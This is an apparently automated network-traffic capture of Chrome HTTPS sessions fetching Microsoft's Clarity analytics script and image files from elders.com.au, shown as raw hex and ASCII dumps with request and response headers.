                                                                                                                                    2024-11-05 08:03:27 UTC1369INData Raw: 1b ec f7 fd af 7f bb fe 51 ff 00 52 75 3f f5 59 e3 cf f8 1f e9 ed ff 00 3d 50 bf 59 7e 09 ff 00 8d fe 86 e3 f3 55 f3 fe 21 de cf 3f da ff 00 fb bf e5 1f f5 27 5c fd 56 f8 ef fe 03 fa 6b 7f ce d1 fa cc f0 47 fc 6f f4 37 1f 9a a3 fe 21 fe cf 3f da ff 00 ff 00 b0 1c a3 fe a4 eb bf aa bf 1e 7f c0 7f 4f 6f f9 ea 0f c4 cf 04 00 a6 f7 0f f6 37 1f 9a af 9f f1 10 f6 77 fe d7 fd 2b ff 00 d9 ff 00 28 f6 ff 00 fd 27 47 ea af c7 9f f0 1f d3 db fe 7a 91 fa cf f0 37 fc 77 f4 37 1f 9a ae 1f f1 14 f6 71 5a 7f 7c 3d 7f f8 7d ca 47 b7 ff 00 52 35 df d5 5f 8f 3f e0 3f a7 b7 fc f5 1f ac ff 00 03 7f c7 7f 43 71 f9 aa e2 7f 51 6f 66 c9 15 3c c5 41 f1 fe ef 79 4f fe 4c 1f 40 f8 55 e3 d2 50 58 63 fe de df f3 d4 7e b3 fc 0d ff 00 1d fd 0d c7 e6 ab af fe 23 7e cc ff 00 db 1f fb bc
                                                                                                                                    Data Ascii: QRu?Y=PY~U!?'\VkGo7!?Oo7w+('Gz7w7qZ|=}GR5_??CqQof<AyOL@UPXc~#~
                                                                                                                                    2024-11-05 08:03:27 UTC1369INData Raw: 27 5c 78 ab 33 52 40 95 c7 7c 8d 8a e4 b0 72 64 2c 21 0a 5b b6 ff 00 ca 6d 37 58 57 68 4a 5a 8a 5b 71 b7 02 dc 23 fc d8 e9 55 db f8 72 ee fe f0 59 ed af 89 f2 3b dd 12 c9 1d b1 3d 1f da 1f 1b 09 ff 00 66 f7 b7 f0 aa 25 de f3 0e db 64 eb ed c1 92 88 59 ef 18 23 96 e8 0e 92 2d e3 7c 8d 1f ed 23 8c fe 0d 58 c7 ff 00 51 ef 66 51 5d 0c 49 e6 17 23 bc 52 16 1a 7b 8d f9 69 b7 0a 14 2a 95 04 af 04 07 6a 87 63 d8 eb 56 7e 0f fc 46 0d 0f 3b 77 60 85 07 bf b6 42 39 83 df 21 1d 23 0a c6 0f 8c 1f 0e 8c 86 2f d2 3f 5a dc db dc 5c a8 3c 9c 3b 95 07 a0 a1 ae af f8 93 7b 2b ad 3f be 7e bf 0f ee eb 95 ff 00 d4 5d 23 f5 45 f1 0f fc 3f fa 7b 6f cf 52 8f c5 ef 87 80 a7 e9 0c 7f d8 5c fe 66 bb 0f ea 41 ec bc 02 7f be 5e 80 54 d3 8e f9 58 d3 f7 0c 16 b5 d1 fa a3 f8 84 a9 fa 3f
                                                                                                                                    Data Ascii: '\x3R@|rd,![m7XWhJZ[q#UrY;=f%dY#-|#XQfQ]I#R{i*jcV~F;w`B9!#/?Z\<;{+?~]#E?{oR\fA^TX?
                                                                                                                                    2024-11-05 08:03:27 UTC1369INData Raw: a0 ff 00 f7 b9 e5 9f 8d 3f fd 44 d1 fa 9f f8 8b fe 1d fd 3d b7 e7 a8 fd 70 fc 39 ff 00 11 fe ef 75 f9 9a e5 ff 00 12 5f 65 87 ff 00 7c ff 00 ee eb 95 ff 00 d4 5d 73 f5 41 f1 17 fc 3b fa 7b 5f cf 57 7f 5c 1f 0e bf c4 7f bb dd 7e 66 be ff 00 c4 93 d9 6f fb 66 ff 00 77 5c af fe a2 e8 fd 50 7c 45 ff 00 0e fe 9e d7 f3 d4 7e b8 3e 1d 7f 88 ff 00 77 ba fc cd 7d ff 00 89 1f b2 ef f6 cc 7f fb dd 72 bf fa 8b a3 f5 41 f1 17 fc 3b fb c5 af e7 a8 fd 70 7c 3a ff 00 11 fe 82 eb f3 35 c8 7e a4 3e cb c9 a0 e6 52 4f ff 00 0e f9 5f fd 45 d0 7e 10 fc 44 19 ed ff 00 de 2d 7f 3d 4a 1f 17 be 1d b8 a3 77 0c 7f f0 f7 5f 99 a3 fe 24 1e cb ff 00 db 2f ad 3f fb 3b e5 6e ff 00 0f fe 82 eb 9f aa 1f 88 88 bf a3 f0 ff 00 6f 6d f9 ea e7 eb 7f e1 da a7 e9 1c 7f f0 f7 5f 99 ae c4 fe a3 7e
                                                                                                                                    Data Ascii: ?D=p9u_e|]sA;{_W\~fofw\P|E~>w}rA;p|:5~>RO_E~D-=Jw_$/?;nom_~
                                                                                                                                    2024-11-05 08:03:27 UTC1369INData Raw: 27 32 4b 9e ec dc ee 14 b0 98 d0 2d 18 aa ac d6 db 5c 3b 6d ba 0d d2 c4 c4 28 f0 59 8f 16 04 38 cd a6 32 1b 8b 16 23 08 42 23 25 8d 89 db 44 80 77 7c 75 9e b7 70 17 2e 63 02 31 b7 25 3c c2 b7 57 01 bf a3 fb 20 27 72 30 03 20 0d 35 5b 34 89 6d 6c 28 ef 57 27 0f 35 69 54 a1 01 f2 90 07 41 42 14 6a 4e 9e bc 79 d6 e7 f0 0f 00 75 90 69 bb 10 7b 86 34 7b c4 12 7a 96 a6 9b 70 42 b0 bb a3 29 a0 db 36 ef 35 3d d5 b9 c4 de ad ab 3f 0e b4 72 9a c6 4e e7 1b a6 bf ff 00 6e 60 ad 5c 21 6d 8b 4e 62 d9 c6 98 88 25 c7 a5 14 92 0f f7 8f 85 2d 3e 83 f1 15 8f 8e 8a 1d 52 40 07 ed 1a 97 78 7f b6 4a ef fd 9e 41 f8 86 a1 00 74 c4 39 5c c5 f9 62 b6 5d 70 71 0b cb f2 88 cb 01 4b 7f 09 8d e3 73 a9 1e 54 e4 58 ea 5c 6d ce b4 2a 52 2a 6b d7 a7 ed d7 8a b1 83 45 ab c7 ba 24 91 7a b4
                                                                                                                                    Data Ascii: '2K-\;m(Y82#B#%Dw|up.c1%<W 'r0 5[4ml(W'5iTABjNyui{4{zpB)65=?rNn`\!mNb%->R@xJAt9\b]pqKsTX\m*R*kE$z
                                                                                                                                    2024-11-05 08:03:27 UTC1369INData Raw: 75 53 65 80 e1 58 ca 6a aa 29 09 34 1d fe 3f b4 0f 81 d7 75 ba 82 01 41 c2 ba 4b 66 84 81 d0 57 a1 ad 3a 77 3a 56 b3 c7 3a 46 8e 43 0a eb 52 7d 3e cf 4a fa 8f f9 74 e3 64 09 8e 74 87 37 85 75 10 29 fb fe de e3 bf ee d7 04 98 a1 a4 a0 44 15 d6 a1 d2 a0 fe ca 7c 7d 7f 66 96 1c 0e 1c 56 92 8e 20 11 9d 74 ab bf 7f b7 b7 71 ff 00 21 d7 55 33 a6 89 76 09 c2 83 d4 d7 a7 a7 d9 fb 3a 6b 9a 82 d2 8b 09 3a c9 e1 5c 09 1d ab f1 e8 3b fe e3 f6 eb aa b4 48 08 68 3c 6b ee e1 d4 ff 00 e0 3f fc ba 29 b8 c0 c9 d8 25 76 02 28 29 db b9 f8 ff 00 e1 d7 49 d4 94 f3 5a 08 55 c8 d6 5b 41 35 14 51 eb d7 a7 61 db b5 7d 74 d3 9e 72 e1 52 9a 07 96 b3 10 80 ae f5 34 35 eb fb 29 fb 6b a6 d6 96 2b 2d 0d 03 4a 74 ad 7b ff 00 35 47 7d 26 ba 85 52 b2 12 d2 69 e9 41 4e 9f 67 f9 4e ea eb 85
                                                                                                                                    Data Ascii: uSeXj)4?uAKfW:w:V:FCR}>Jtdt7u)D|}fV tq!U3v:k:\;Hh<k?)%v()IZU[A5Qa}trR45)k+-Jt{5G}&RiANgN
                                                                                                                                    2024-11-05 08:03:27 UTC1369INData Raw: 37 6b dd 10 99 cf 9d 46 b2 70 c0 9c 0e 84 15 34 5a 4b 83 08 b8 3b bc a5 26 ed 39 25 49 57 76 d7 75 b5 97 5a 58 3d 92 55 40 47 d9 ac 8d c9 69 bd d0 32 fb 53 4a 7c b8 d6 b2 0f f7 55 54 58 0e 3d 07 31 4d 78 a1 4e 97 fc 49 ea ef 27 e1 0d 82 41 a0 3e 4b 12 06 e4 00 7f 0d c5 f4 3a 5d cf fb c4 ab 90 b6 90 ff 00 46 4d 45 66 11 c5 cc dc c5 f9 62 b6 5e fd bd 6a c8 24 dd 9c 76 7a 64 4f b3 dc 60 c8 8b 20 33 e2 6c da f2 3b 13 61 d6 0a 12 56 97 1c 6c 00 b0 54 52 68 93 d0 d4 6b c5 63 b8 57 c7 6c 8d ee d8 0b 81 e2 75 30 e0 7d 95 eb 13 45 aa e6 42 49 c4 27 98 8f 5d 24 48 b7 3e e5 db 03 92 7b b9 74 ca 24 32 12 09 59 2c e3 f7 05 fe 1f 50 54 77 83 b8 f5 3a 97 34 ad d2 f8 d9 82 69 07 cb 85 39 14 78 46 07 15 f5 53 82 e4 d7 e3 63 0a 45 6b 6f e4 ec 62 7a 9b a8 da 6b 1a e8 c5 36
                                                                                                                                    Data Ascii: 7kFp4ZK;&9%IWvuZX=U@Gi2SJ|UTX=1MxNI'A>K:]FMEfb^j$vzdO` 3l;aVlTRhkcWlu0}EBI']$H>{t$2Y,PTw:4i9xFScEkobzk6


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    143192.168.2.44992313.107.246.454435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:26 UTC422OUTGET /s/0.7.53/clarity.js HTTP/1.1
                                                                                                                                    Host: www.clarity.ms
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: CLID=a7d61f4104e24a3ab7dd66c7c8abcd4a.20241105.20251105
                                                                                                                                    2024-11-05 08:03:26 UTC550INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:26 GMT
                                                                                                                                    Content-Type: application/javascript;charset=utf-8
                                                                                                                                    Content-Length: 67020
                                                                                                                                    Connection: close
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Last-Modified: Mon, 04 Nov 2024 16:45:38 GMT
                                                                                                                                    ETag: "0x8DCFCF01CE35FFD"
                                                                                                                                    x-ms-request-id: 1102a136-c01e-002b-5eda-2eae17000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    x-azure-ref: 20241105T080326Z-15869dbbcc662ldwhC1DFW660000000001dg0000000018ex
                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                    x-fd-int-roxy-purgeid: 51562430
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:26 UTC15834INData Raw: 2f 2a 20 63 6c 61 72 69 74 79 2d 6a 73 20 76 30 2e 37 2e 35 33 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 69 63 72 6f 73 6f 66 74 2f 63 6c 61 72 69 74 79 20 28 4c 69 63 65 6e 73 65 3a 20 4d 49 54 29 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 6e 75 6c 6c 2c 67 65 74 20 71 75 65 75 65 28 29 7b 72 65 74 75 72 6e 20 73 72 7d 2c 67 65 74 20 73 74 61 72 74 28 29 7b 72 65 74 75 72 6e 20 63 72 7d 2c 67 65 74 20 73 74 6f 70 28 29 7b 72 65 74 75 72 6e 20 6c 72 7d 2c 67 65 74 20 74 72 61 63 6b 28 29 7b 72 65 74 75 72 6e 20 61 72 7d 7d 29 2c 65 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f
                                                                                                                                    Data Ascii: /* clarity-js v0.7.53: https://github.com/microsoft/clarity (License: MIT) */!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return sr},get start(){return cr},get stop(){return lr},get track(){return ar}}),e=Object.freeze({__pro
                                                                                                                                    2024-11-05 08:03:26 UTC16384INData Raw: 2c 73 65 6c 65 63 74 6f 72 3a 6e 75 6c 6c 2c 68 61 73 68 3a 6e 75 6c 6c 2c 72 65 67 69 6f 6e 3a 6c 2c 6d 65 74 61 64 61 74 61 3a 7b 61 63 74 69 76 65 3a 21 30 2c 73 75 73 70 65 6e 64 3a 21 31 2c 70 72 69 76 61 63 79 3a 66 2c 70 6f 73 69 74 69 6f 6e 3a 6e 75 6c 6c 2c 66 72 61 75 64 3a 64 2c 73 69 7a 65 3a 6e 75 6c 6c 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 61 3d 65 2e 64 61 74 61 2c 72 3d 65 2e 6d 65 74 61 64 61 74 61 2c 69 3d 72 2e 70 72 69 76 61 63 79 2c 6f 3d 61 2e 61 74 74 72 69 62 75 74 65 73 7c 7c 7b 7d 2c 75 3d 61 2e 74 61 67 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3b 73 77 69 74 63 68 28 21 30 29 7b 63 61 73 65 20 50 74 2e 69 6e 64 65 78 4f 66 28 75 29 3e 3d 30 3a 76 61 72 20 63 3d 6f 2e 74 79 70 65 2c 73 3d 22 22 2c
                                                                                                                                    Data Ascii: ,selector:null,hash:null,region:l,metadata:{active:!0,suspend:!1,privacy:f,position:null,fraud:d,size:null}},function(t,e,n){var a=e.data,r=e.metadata,i=r.privacy,o=a.attributes||{},u=a.tag.toUpperCase();switch(!0){case Pt.indexOf(u)>=0:var c=o.type,s="",
                                                                                                                                    2024-11-05 08:03:26 UTC16384INData Raw: 74 2e 61 76 61 69 6c 61 62 69 6c 69 74 79 29 2c 47 72 28 31 34 2c 74 2e 69 74 65 6d 43 6f 6e 64 69 74 69 6f 6e 29 2c 47 72 28 31 33 2c 74 2e 70 72 69 63 65 43 75 72 72 65 6e 63 79 29 2c 47 72 28 31 32 2c 74 2e 73 6b 75 29 2c 57 28 31 33 2c 5a 6e 28 74 2e 70 72 69 63 65 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 62 72 61 6e 64 22 3a 47 72 28 36 2c 74 2e 6e 61 6d 65 29 7d 6e 75 6c 6c 21 3d 3d 72 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 72 26 26 4b 6e 28 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 5a 6e 28 74 2c 65 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 31 29 2c 6e 75 6c 6c 21 3d 3d 74 29 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 74 29 7b 63 61 73 65 22 6e 75 6d 62 65 72 22 3a 72 65 74 75 72 6e 20 4d 61 74 68 2e 72 6f 75 6e 64
                                                                                                                                    Data Ascii: t.availability),Gr(14,t.itemCondition),Gr(13,t.priceCurrency),Gr(12,t.sku),W(13,Zn(t.price));break;case"brand":Gr(6,t.name)}null!==r&&"object"==typeof r&&Kn(r)}}function Zn(t,e){if(void 0===e&&(e=1),null!==t)switch(typeof t){case"number":return Math.round
                                                                                                                                    2024-11-05 08:03:27 UTC16384INData Raw: 34 31 3a 53 74 26 26 28 65 2e 70 75 73 68 28 53 74 2e 69 64 29 2c 65 2e 70 75 73 68 28 53 74 2e 74 61 72 67 65 74 29 2c 65 2e 70 75 73 68 28 53 74 2e 63 68 65 63 6b 73 75 6d 29 2c 73 72 28 65 2c 21 31 29 29 7d 72 65 74 75 72 6e 5b 32 5d 7d 29 29 7d 29 29 7d 76 61 72 20 62 72 2c 77 72 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 72 28 74 2c 65 2c 6e 2c 61 2c 72 29 7b 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 6e 75 6c 6c 29 2c 76 6f 69 64 20 30 3d 3d 3d 61 26 26 28 61 3d 6e 75 6c 6c 29 2c 76 6f 69 64 20 30 3d 3d 3d 72 26 26 28 72 3d 6e 75 6c 6c 29 3b 76 61 72 20 69 3d 6e 3f 22 22 2e 63 6f 6e 63 61 74 28 6e 2c 22 7c 22 29 2e 63 6f 6e 63 61 74 28 61 29 3a 22 22 3b 74 20 69 6e 20 77 72 26 26 77 72 5b 74 5d 2e 69 6e 64 65 78 4f 66 28 69 29 3e 3d 30 7c 7c 28 62
                                                                                                                                    Data Ascii: 41:St&&(e.push(St.id),e.push(St.target),e.push(St.checksum),sr(e,!1))}return[2]}))}))}var br,wr={};function kr(t,e,n,a,r){void 0===n&&(n=null),void 0===a&&(a=null),void 0===r&&(r=null);var i=n?"".concat(n,"|").concat(a):"";t in wr&&wr[t].indexOf(i)>=0||(b
                                                                                                                                    2024-11-05 08:03:27 UTC2034INData Raw: 6d 61 6e 63 65 45 76 65 6e 74 54 69 6d 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 26 26 28 69 6f 28 61 29 2c 47 72 28 33 37 2c 61 6f 28 29 2e 74 6f 53 74 72 69 6e 67 28 29 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 6c 61 79 6f 75 74 2d 73 68 69 66 74 22 3a 65 26 26 21 61 2e 68 61 64 52 65 63 65 6e 74 49 6e 70 75 74 26 26 50 28 39 2c 31 65 33 2a 61 2e 76 61 6c 75 65 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 6c 61 72 67 65 73 74 2d 63 6f 6e 74 65 6e 74 66 75 6c 2d 70 61 69 6e 74 22 3a 65 26 26 57 28 38 2c 61 2e 73 74 61 72 74 54 69 6d 65 29 7d 7d 7d 28 74 2e 67 65 74 45 6e 74 72 69 65 73 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 73 6f 28 74 29 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 3b 72 65 74 75 72 6e 20
                                                                                                                                    Data Ascii: manceEventTiming.prototype&&(io(a),Gr(37,ao().toString()));break;case"layout-shift":e&&!a.hadRecentInput&&P(9,1e3*a.value);break;case"largest-contentful-paint":e&&W(8,a.startTime)}}}(t.getEntries())}function so(t){var e=document.createElement("a");return


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    144192.168.2.449937162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:26 UTC1201OUTGET /content/dam/eld/images/livestocknow/close_up_ram_head_horns.png HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true
                                                                                                                                    2024-11-05 08:03:28 UTC730INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:28 GMT
                                                                                                                                    Content-Type: image/png
                                                                                                                                    Content-Length: 292817
                                                                                                                                    Connection: close
                                                                                                                                    last-modified: Mon, 02 Sep 2024 07:18:07 GMT
                                                                                                                                    etag: "0x8DCCB1F6482CE1F"
                                                                                                                                    content-disposition: attachment; filename="close_up_ram_head_horns.png"; filename*=UTF-8''close_up_ram_head_horns.png
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    Cache-Control: public, max-age=86400, immutable
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210103-DFW
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1725838988.415905,VS0,VS0,VE1443
                                                                                                                                    CF-Cache-Status: REVALIDATED
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53cb8b3b0c34-DFW
                                                                                                                                    2024-11-05 08:03:28 UTC639INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 58 00 00 01 90 08 06 00 00 00 72 35 1e 98 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 05 22 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 27 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 27 3e 0a 20 20 20 20 20 20 20 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 30 32 2f 32 32 2d 72 64 66 2d 73 79 6e 74 61 78 2d 6e 73 23 27 3e 0a 0a 20 20 20 20 20 20 20 20 3c 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 20 72 64 66 3a 61 62 6f 75 74 3d 27 27 0a 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3a 64 63 3d 27 68 74 74
                                                                                                                                    Data Ascii: PNGIHDRXr5pHYs+"iTXtXML:com.adobe.xmp<x:xmpmeta xmlns:x='adobe:ns:meta/'> <rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'> <rdf:Description rdf:about='' xmlns:dc='htt
                                                                                                                                    2024-11-05 08:03:28 UTC1369INData Raw: 20 20 20 20 20 20 20 20 3c 72 64 66 3a 6c 69 20 72 64 66 3a 70 61 72 73 65 54 79 70 65 3d 27 52 65 73 6f 75 72 63 65 27 3e 0a 20 20 20 20 20 20 20 20 3c 41 74 74 72 69 62 3a 43 72 65 61 74 65 64 3e 32 30 32 34 2d 30 39 2d 30 32 3c 2f 41 74 74 72 69 62 3a 43 72 65 61 74 65 64 3e 0a 20 20 20 20 20 20 20 20 3c 41 74 74 72 69 62 3a 45 78 74 49 64 3e 63 36 62 37 66 34 34 38 2d 33 34 30 63 2d 34 66 36 35 2d 62 33 35 66 2d 38 33 62 62 65 35 61 39 37 38 62 37 3c 2f 41 74 74 72 69 62 3a 45 78 74 49 64 3e 0a 20 20 20 20 20 20 20 20 3c 41 74 74 72 69 62 3a 46 62 49 64 3e 35 32 35 32 36 35 39 31 34 31 37 39 35 38 30 3c 2f 41 74 74 72 69 62 3a 46 62 49 64 3e 0a 20 20 20 20 20 20 20 20 3c 41 74 74 72 69 62 3a 54 6f 75 63 68 54 79 70 65 3e 32 3c 2f 41 74 74 72 69 62 3a
                                                                                                                                    Data Ascii: <rdf:li rdf:parseType='Resource'> <Attrib:Created>2024-09-02</Attrib:Created> <Attrib:ExtId>c6b7f448-340c-4f65-b35f-83bbe5a978b7</Attrib:ExtId> <Attrib:FbId>525265914179580</Attrib:FbId> <Attrib:TouchType>2</Attrib:
                                                                                                                                    2024-11-05 08:03:28 UTC1369INData Raw: e1 70 38 1c 8e 13 c3 09 96 c3 e1 70 38 1c 0e c7 89 e1 04 cb e1 70 38 1c 0e 87 e3 c4 70 82 e5 70 38 1c 0e 87 c3 71 62 38 c1 72 38 1c 0e 87 c3 e1 38 31 9c 60 39 1c 0e 87 c3 e1 70 9c 18 4e b0 1c 0e 87 c3 e1 70 38 4e 0c 27 58 0e 87 c3 e1 70 38 1c 27 86 13 2c 87 c3 e1 70 38 1c 8e 13 c3 09 96 c3 e1 70 38 1c 0e c7 89 e1 04 cb e1 70 38 1c 0e 87 e3 c4 70 82 e5 70 38 1c 0e 87 c3 71 62 38 c1 72 38 1c 0e 87 c3 e1 38 31 9c 60 39 1c 0e 87 c3 e1 70 9c 18 4e b0 1c 0e 87 c3 e1 70 38 4e 0c 27 58 0e 87 c3 e1 70 38 1c 27 86 13 2c 87 c3 e1 70 38 1c 8e 13 c3 09 96 c3 e1 70 38 1c 0e c7 89 e1 04 cb e1 70 38 1c 0e 87 e3 c4 70 82 e5 70 38 1c 0e 87 c3 71 62 38 c1 72 38 1c 0e 87 c3 e1 38 31 9c 60 39 1c 0e 87 c3 e1 70 9c 18 4e b0 1c 0e 87 c3 e1 70 38 4e 0c 27 58 0e 87 c3 e1 70 38 1c
                                                                                                                                    Data Ascii: p8p8p8pp8qb8r881`9pNp8N'Xp8',p8p8p8pp8qb8r881`9pNp8N'Xp8',p8p8p8pp8qb8r881`9pNp8N'Xp8
                                                                                                                                    2024-11-05 08:03:28 UTC1369INData Raw: b2 08 80 2b 42 65 70 2d c8 79 07 ce 19 35 17 70 e5 36 e9 4a 2d 07 e7 d9 26 b5 92 1b 8a 01 b5 56 3b 71 04 9b a4 66 90 48 ae 1b 24 03 34 28 c1 61 a0 4d 7e 5b c4 9a ad 01 50 39 c3 0c 32 19 29 ad 15 a5 14 94 c2 28 a5 60 cd 19 a5 56 94 0a f9 ae 7f 3b 2f 1b 4c cb 16 d3 72 86 10 27 50 8a a0 10 11 e3 04 4a 33 68 9a e4 75 0a 88 29 c9 c2 13 23 88 02 42 48 80 9e 17 b1 9c fb cb 97 2f f1 f4 e9 fb f8 d2 97 bf 82 2f 7e e9 cb b8 7e 75 03 2e 15 65 cd 58 4b 16 23 93 0b 4a 2e c8 b5 34 23 b4 e6 8a 7d ce d8 af 7b 70 c1 c1 3d 3c 46 e0 3a ae 67 72 3b 6d 81 85 18 27 d2 85 80 58 17 dd e1 7d 01 62 b8 00 86 7e 03 e9 cf 61 38 96 2d 16 ba 84 b6 c5 a0 12 21 02 88 44 b8 bc 3c c3 ef 78 f4 10 df f8 f1 8f e3 d1 47 3f 86 ed d5 7d a4 cd 06 f3 76 83 b0 59 30 6d ce 91 b6 5b 84 98 10 e7 19 cb
                                                                                                                                    Data Ascii: +Bep-y5p6J-&V;qfH$4(aM~[P92)(`V;/Lr'PJ3hu)#BH//~~u.eXK#J.4#}{p=<F:gr;m'X}b~a8-!D<xG?}vY0m[
                                                                                                                                    2024-11-05 08:03:28 UTC1369INData Raw: e3 c7 67 d4 6c 2f 80 88 a8 b6 b3 aa da 24 51 00 99 4f 40 2e b5 a9 f2 a6 b4 d9 b9 12 b1 cc d2 36 a6 19 31 98 73 1b 07 e5 35 82 6c cc 26 71 d8 42 48 8d 44 da 7c 24 10 38 c9 f3 8a 35 23 86 d8 14 c3 35 57 d4 52 00 ae 58 0b 70 bb ee b1 dd 67 dc ee 2b d6 cc 58 73 41 1e 14 d1 52 bb 41 a4 d7 a8 ee dd 18 1d 04 7b 56 eb ba e2 a7 7f f2 27 f0 b3 3f f5 13 f8 b3 7f fa 3f c3 37 7f cb 37 e3 db fe a5 7f 05 7f e0 9f fb 36 2c 9b cd 6f 7a cc af 05 be 6e 08 56 2d 05 ff eb ff f8 03 f8 73 ff cd 9f c1 db 5f f9 b2 30 70 8c 46 00 ba 2e 13 6a 15 92 65 83 ea 60 72 0c e4 6a 50 c7 db 8f 01 84 18 64 e2 c7 18 55 a1 a2 36 e0 28 58 70 88 24 04 40 40 8a 01 29 12 96 79 c6 b2 2c 58 96 05 d3 48 ae e6 19 69 59 10 a7 59 c8 45 0c 60 0a 20 ae 20 aa 00 08 b5 64 21 5b d0 b5 cc 48 53 ed 1e a9 4c ba
                                                                                                                                    Data Ascii: gl/$QO@.61s5l&qBHD|$85#5WRXpg+XsARA{V'??776,oznV-s_0pF.je`rjPdU6(Xp$@@)y,XHiYYE` d![HSL
